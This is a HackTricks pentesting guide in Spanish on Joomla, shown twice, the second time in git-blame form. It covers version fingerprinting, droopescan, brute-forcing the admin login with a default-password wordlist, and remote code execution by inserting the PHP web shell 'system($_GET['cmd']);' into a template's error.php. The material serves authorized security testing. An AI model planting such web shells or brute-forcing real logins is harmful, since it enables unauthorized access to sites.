hacktricks/network-services-pentesting/pentesting-web/joomla.md

# Joomla

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver a tu **empresa anunciada en HackTricks**? o ¿quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

### Estadísticas de Joomla

Joomla recopila algunas [estadísticas de uso](https://developer.joomla.org/about/stats.html) anónimas como la distribución de versiones de Joomla, PHP y bases de datos, y sistemas operativos de servidores en uso en instalaciones de Joomla. Estos datos se pueden consultar a través de su [API](https://developer.joomla.org/about/stats/api.html) pública.
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
```
## Enumeración

### Descubrimiento/Huellas

* Verificar el **meta**
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
```
* robots.txt
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
```
* README.txt
```
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```
### Versión

* En **/administrator/manifests/files/joomla.xml** _**** puedes ver la versión._
* En **/language/en-GB/en-GB.xml** puedes obtener la versión de Joomla.
* En **plugins/system/cache/cache.xml** puedes ver una versión aproximada.

### Automático
```bash
droopescan scan joomla --url http://joomla-site.local/
```
### Fuerza Bruta

Puedes usar este [script](https://github.com/ajnik/joomla-bruteforce) para intentar realizar un ataque de fuerza bruta en el inicio de sesión.
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin
```
## RCE

Si lograste obtener **credenciales de administrador** puedes realizar **RCE dentro de él** añadiendo un fragmento de **código PHP** para obtener **RCE**. Podemos hacer esto **personalizando** una **plantilla**.

1. **Haz clic** en **`Plantillas`** en la parte inferior izquierda bajo `Configuración` para abrir el menú de plantillas.
2. **Haz clic** en el nombre de una **plantilla**. Vamos a elegir **`protostar`** bajo el encabezado de columna `Plantilla`. Esto nos llevará a la página **`Plantillas: Personalizar`**.
3. Finalmente, puedes hacer clic en una página para abrir el **código fuente de la página**. Vamos a elegir la página **`error.php`**. Añadiremos un **PHP de una línea para obtener ejecución de código** de la siguiente manera:
   1. **`system($_GET['cmd']);`**
4. **Guardar y Cerrar**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? o ¿quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
f 2023-06-05 18:33:24 +00:00			`# Joomla`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver a tu empresa anunciada en HackTricks? o ¿quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Consigue el [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
f 2023-06-05 18:33:24 +00:00			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`### Estadísticas de Joomla`

Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`Joomla recopila algunas [estadísticas de uso](https://developer.joomla.org/about/stats.html) anónimas como la distribución de versiones de Joomla, PHP y bases de datos, y sistemas operativos de servidores en uso en instalaciones de Joomla. Estos datos se pueden consultar a través de su [API](https://developer.joomla.org/about/stats/api.html) pública.`
f 2023-06-05 18:33:24 +00:00			```bash
			`curl -s https://developer.joomla.org/stats/cms_version \| python3 -m json.tool`

			`{`
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`"data": {`
			`"cms_version": {`
			`"3.0": 0,`
			`"3.1": 0,`
			`"3.10": 6.33,`
			`"3.2": 0.01,`
			`"3.3": 0.02,`
			`"3.4": 0.05,`
			`"3.5": 12.24,`
			`"3.6": 22.85,`
			`"3.7": 7.99,`
			`"3.8": 17.72,`
			`"3.9": 27.24,`
			`"4.0": 3.21,`
			`"4.1": 1.53,`
			`"4.2": 0.82,`
			`"4.3": 0,`
			`"5.0": 0`
			`},`
			`"total": 2951032`
			`}`
f 2023-06-05 18:33:24 +00:00			`}`
			```
			`## Enumeración`

Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`### Descubrimiento/Huellas`
f 2023-06-05 18:33:24 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`* Verificar el meta`
f 2023-06-05 18:33:24 +00:00			```bash
			`curl https://www.joomla.org/ \| grep Joomla \| grep generator`

			`<meta name="generator" content="Joomla! - Open Source Content Management" />`
			```
			`* robots.txt`
			```
			`# If the Joomla site is installed within a folder`
			`# eg www.example.com/joomla/ then the robots.txt file`
			`# MUST be moved to the site root`
			`# eg www.example.com/robots.txt`
			`# AND the joomla folder name MUST be prefixed to all of the`
			`# paths.`
			`[...]`
			```
			`* README.txt`
			```
			`1- What is this?`
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`* This is a Joomla! installation/upgrade package to version 3.x`
			`* Joomla! Official site: https://www.joomla.org`
			`* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history`
			`* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging`
f 2023-06-05 18:33:24 +00:00			```
			`### Versión`

			`* En /administrator/manifests/files/joomla.xml _**** puedes ver la versión._`
			`* En /language/en-GB/en-GB.xml puedes obtener la versión de Joomla.`
			`* En plugins/system/cache/cache.xml puedes ver una versión aproximada.`
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00
			`### Automático`
f 2023-06-05 18:33:24 +00:00			```bash
			`droopescan scan joomla --url http://joomla-site.local/`
			```
			`### Fuerza Bruta`

Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`Puedes usar este [script](https://github.com/ajnik/joomla-bruteforce) para intentar realizar un ataque de fuerza bruta en el inicio de sesión.`
f 2023-06-05 18:33:24 +00:00			```shell-session
			`sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin`
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00
f 2023-06-05 18:33:24 +00:00			`admin:admin`
			```
			`## RCE`

Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`Si lograste obtener credenciales de administrador puedes realizar RCE dentro de él añadiendo un fragmento de código PHP para obtener RCE. Podemos hacer esto personalizando una plantilla.`
f 2023-06-05 18:33:24 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			1. Haz clic en `Plantillas` en la parte inferior izquierda bajo `Configuración` para abrir el menú de plantillas.
			2. Haz clic en el nombre de una plantilla. Vamos a elegir `protostar` bajo el encabezado de columna `Plantilla`. Esto nos llevará a la página `Plantillas: Personalizar`.
			3. Finalmente, puedes hacer clic en una página para abrir el código fuente de la página. Vamos a elegir la página `error.php`. Añadiremos un PHP de una línea para obtener ejecución de código de la siguiente manera:
f 2023-06-05 18:33:24 +00:00			1. `system($_GET['cmd']);`
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to e 2023-12-25 00:37:58 +00:00			`4. Guardar y Cerrar`
			5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? o ¿quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Consigue el [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`